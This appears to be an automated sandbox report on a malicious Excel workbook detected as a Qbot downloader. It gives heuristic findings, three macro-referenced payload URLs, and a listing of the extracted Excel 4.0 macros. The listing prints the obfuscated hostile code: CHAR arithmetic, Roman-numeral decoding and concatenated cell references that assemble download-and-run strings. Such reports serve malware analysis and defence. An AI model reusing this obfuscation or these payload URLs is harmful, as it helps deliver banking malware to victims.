MALICIOUS
262
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.Qbot11202120-9906200-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Qbot11202120-9906200-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
URL reconstructed from XLM cell array (3 URLs) critical OLE_XLM_CELL_ARRAY_URLExcel 4.0 macro sheet stages its payload URL across the BIFF8 Shared String Table (one quoted-char SST entry concatenated with & at runtime), across individual numeric cells (one ASCII charcode per cell), or split across multi-char fragment cells a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF8 record stream and decoding SST entries, LABELSST/RK/NUMBER cells, and FORMULA cell-reference concatenation in token order.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://decinfo.com.br/s4hfZyv7NFEM/y9.html Referenced by macro
- https://imprimija.com.br/BIt2Zlm3/y5.htmlReferenced by macro
- https://stunningmax.com/JR3xNs7W7Wm1/y1.htmlReferenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 11292 bytes |
SHA-256: 230bdabe975ee04968fa009647a2319aa74c7d8f3acbeb25b6d04959c2937676 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Shee
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sbur
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sbur
' 0085 13 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sbur
' 0085 11 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Ko
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - DEFW
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - DEFW
' 0085 12 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - DEF
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Beff
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Beff
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Beff
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Beff
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Beff
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Beff
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Beff
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - Beff
' 0018 29 LABEL : Cell Value, String Constant - _xlfn.ARABIC hidden len=2 ptgErr *INCOMPLETE FORMULA PARSING* Remaining, unparsed expression: b'\x1d'
' 0018 26 LABEL : Cell Value, String Constant - EFEF len=7 ptgRef3d Beff!D3
' 0018 26 LABEL : Cell Value, String Constant - ERFW len=7 ptgRef3d Shee!G18
' 0018 26 LABEL : Cell Value, String Constant - GRRG len=7 ptgRef3d Shee!G14
' 0018 26 LABEL : Cell Value, String Constant - LALW len=7 ptgRef3d Shee!G16
' 0018 26 LABEL : Cell Value, String Constant - RFWF len=7 ptgRef3d Beff!C4
' 0018 26 LABEL : Cell Value, String Constant - RTWE len=7 ptgRef3d Beff!C4
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Shee!G1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' Sbur,D1,CHAR(210-100),""
' Sbur,T1,CHAR(86-1),""
' Sbur,I2,CHAR(120-53),""
' Sbur,L2,CHAR(200-135),""
' Sbur,N2,CHAR(182-100),""
' Sbur,E3,CHAR(102-54),""
' Sbur,Q3,CHAR(179-110),""
' Sbur,G5,CHAR(215-99),""
' Sbur,B6,CHAR(100-25),""
' Sbur,M6,CHAR(210-101),""
' Sbur,P6,CHAR(193-110),""
' Sbur,K7,CHAR(222-101),""
' Sbur,S7,CHAR(103-50),""
' Sbur,E8,CHAR(208-100),""
' Sbur,H8,CHAR(200-89),""
' Sbur,Q9,CHAR(203-100),""
' Sbur,C10,CHAR(201-100),""
' Sbur,F11,CHAR(200-103),""
' Sbur,J11,CHAR(104-46),""
' Sbur,L11,CHAR(216-99),""
' Sbur,O11,CHAR(205-101),""
' Sbur,N13,CHAR(186-110),""
' Sbur,A14,CHAR(215-101),""
' Sbur,G14,CHAR(100-32),""
' Sbur,Q14,CHAR(219-101),""
' Sbur,D15,CHAR(205-100),""
' Sbur,I15,CHAR(170-96),""
' Sbur,O16,CHAR(220-100),""
' Sbur,B17,CHAR(102-51),""
' Sbur,E18,CHAR(201-102),""
' Sbur,L18,CHAR(213-128),""
' Sbur,C19,CHAR(101-51),""
' Sbur,J20,CHAR(219-100),""
' Sbur,N20,CHAR(176-110),""
' Sbur,G21,CHAR(213-101),""
' Sbur,D24,CHAR(200-85),""
' Sbur,K24,CHAR(201-101),""
' Sbur,H25,CHAR(164-80),""
' Sbur,F27,CHAR(160-90),""
' Sbur,F44,"",1.00000000000000000000
' Sbur,D53,_xlfn.ARABIC("CXI"),""
' Sbur,J53,_xlfn.ARABIC("LXXVI"),""
' Sbur,G54,_xlfn.ARABIC("LXV"),""
' Sbur,S55,_xlfn.ARABIC("LXVII"),""
' Sbur,O57,_xlfn.ARABIC("CI"),""
' Sbur,E59,_xlfn.ARABIC("LXI"),""
' Sbur,T60,_xlfn.ARABIC("CXIV"),""
' Sbur,H1,T( Sbur!K7& Sbur!L2& Sbur!G34& Sbur!G35& Sbur!G34& Sbur!I15& Sbur!I2& Sbur!I15& Sbur!G34& Sbur!G35& Sbur!G34),""
' Sbur,D2,T( Sbur!E3& Sbur!G35& Sbur!E3& Sbur!E67),""
' Sbur,R2,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35&D2),""
' Sbur,K3,T( Sbur!F11& Sbur!G5& Sbur!C10& Sbur!G14& Sbur!D15),""
' Sbur,T4,T( Sbur!E3& Sbur!G35& Sbur!S7& Sbur!E67),""
' Sbur,B5,T( Sbur!G34& Sbur!B6& Sbur!C10),""
' Sbur,N6,T( Sbur!C10& Sbur!E18& Sbur!G5& Sbur!H8),""
' Sbur,D8,T( Sbur!D1& Sbur!C10& Sbur!E8& Sbur!B17& Sbur!C19& Sbur!G34& Sbur!G35& Sbur!G34& Sbur!I2),""
' Sbur,P9,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G34& Sbur!G35& Sbur!E3& Sbur!E67),""
' Sbur,J10,T( Sbur!L2& Sbur!G34& Sbur!G35& Sbur!K47& Sbur!I15& Sbur!I15),""
' Sbur,F12,T( Sbur!G34& Sbur!L11),""
' Sbur,D14,T( Sbur!D1& Sbur!G34& Sbur!G35& Sbur!G34),""
' Sbur,Q15,T( Sbur!G34& Sbur!T1& Sbur!N2& Sbur!N13& Sbur!G14& Sbur!H8& Sbur!J20& Sbur!D1& Sbur!E8& Sbur!H8& Sbur!F11& Sbur!K24& Sbur!H25& Sbur!H8& Sbur!F27& Sbur!D15& Sbur!E8),""
' Sbur,L16,T( Sbur!E8& Sbur!M6& Sbur!H8& Sbur!D1& Sbur!G34& Sbur!G35),""
' Sbur,B17,T( Sbur!G34& Sbur!P6& Sbur!O11),""
' Sbur,G19,T( Sbur!E3& Sbur!G35),""
' Sbur,Q21,T( Sbur!N20& Sbur!N20& Sbur!G34& Sbur!G35),""
' Sbur,F23,T( Sbur!E8& Sbur!E8& Sbur!B17& Sbur!C19& Sbur!G34& Sbur!G35& Sbur!G34& Sbur!P6& Sbur!O11),""
' Sbur,N25,T( Sbur!I15& Sbur!I15& Sbur!G34& Sbur!G35& Beff!G19& Sbur!G34& Sbur!H8& Sbur!G21),""
' Sbur,S27,T( Sbur!E8& Sbur!E8& Sbur!Q3& Sbur!O16& Sbur!C10& Sbur!E18& Sbur!L11& Sbur!G5& Sbur!C10& Sbur!L2& Sbur!G34& Sbur!G35& Sbur!G34& Sbur!I15& Sbur!I15),""
' Sbur,O30,T( Sbur!C10& Sbur!Q9& Sbur!D24& Sbur!Q14),""
' Sbur,G1,T( Beff!Q21& Beff!G19& Beff!H32),""
' Sbur,S2,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!C19& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35& Beff!D2),""
' Sbur,N4,T( Beff!Q21& Beff!G19& Beff!J29),""
' Sbur,C8,T( Beff!Q21& Beff!G19& Beff!F29),""
' Sbur,S8,T( Sbur!B17& Sbur!C19& Sbur!G34& Sbur!G35& Sbur!G34),""
' Sbur,I11,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!F44& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!G34& Sbur!G35& Beff!D2),""
' Sbur,O17,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!F44& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35& Beff!T4),""
' Sbur,D18,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35& Beff!T4),""
' Sbur,G23,T( Sbur!N47& Sbur!N49& Sbur!G14& Sbur!F11& Sbur!G5& Sbur!H8& Sbur!G21& Sbur!G38& Sbur!P26& Sbur!P28& Sbur!P28& Sbur!P32& Sbur!C19& Sbur!G41& Sbur!P26& Sbur!P28& Sbur!P30& Sbur!P32& Sbur!G34& Sbur!G35& Beff!T4),""
' DEF,G10,"FORMULA.FILL()=FORMULA( Beff!D12, Beff!G2)=FORMULA( Sbur!D10, Ko!A2)=FORMULA()=FORMULA( Ko!E9, DEFW!H1)=FORMULA()=FORMULA( DEFW!C8, DEFW!I4)=FORMULA( DEFW!C10, DEF!B3)=FORMULA( DEF!D10, Sbur!J8)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!B5& Sbur!J8& Beff!D8& Sbur!J8& DEF!B3& Beff!K3& Sbur!J8& Beff!N6& Sbur!J8& Beff!H1& DEFW!I4& Beff!P9,G16)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!F12& Sbur!J8& Beff!L16& Beff!Q15& DEF!B3& Beff!J10& DEFW!I4& DEFW!I4& Beff!C8& DEFW!I4& Beff!R2,G18)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!F12& Sbur!J8& Beff!L16& Beff!Q15& DEF!B3& Beff!J10& DEFW!I4& DEFW!I4& Beff!G1& DEFW!I4& Beff!I11,G20)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!F12& Sbur!J8& Beff!L16& Beff!Q15& DEF!B3& Beff!J10& DEFW!I4& DEFW!I4& Beff!N4& DEFW!I4& Beff!S2,G22)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!B17& DEF!B3& Beff!F23& DEF!B3& Beff!S27& DEFW!I4& DEFW!I4& DEFW!I4& Beff!N25& DEF!B3& Beff!D14& Sbur!J8& Beff!O30& Sbur!J8& Beff!S8& DEFW!I4& Beff!D18,G24)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!B17& DEF!B3& Beff!F23& DEF!B3& Beff!S27& DEFW!I4& DEFW!I4& DEFW!I4& Beff!N25& DEF!B3& Beff!D14& Sbur!J8& Beff!O30& Sbur!J8& Beff!S8& DEFW!I4& Beff!O17,G26)=FORMULA( Ko!A2& DEFW!I4& Sbur!O82& DEFW!H1& DEFW!H1& Sbur!E66& Beff!B17& DEF!B3& Beff!F23& DEF!B3& Beff!S27& DEFW!I4& DEFW!I4& DEFW!I4& Beff!N25& DEF!B3& Beff!D14& Sbur!J8& Beff!O30& Sbur!J8& Beff!S8& DEFW!I4& Beff!G23,G28)",""
' Beff,C11,CHAR( Sbur!D53),""
' Beff,D10,CHAR( Sbur!E59),""
' Beff,E9,CHAR( Sbur!J53),""
' Beff,C8,CHAR( Sbur!S55),""
' Beff,C10,CHAR( Sbur!O57),""
' Beff,D10,CHAR( Sbur!T60),""
' Beff,D12,CHAR( Sbur!G54),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.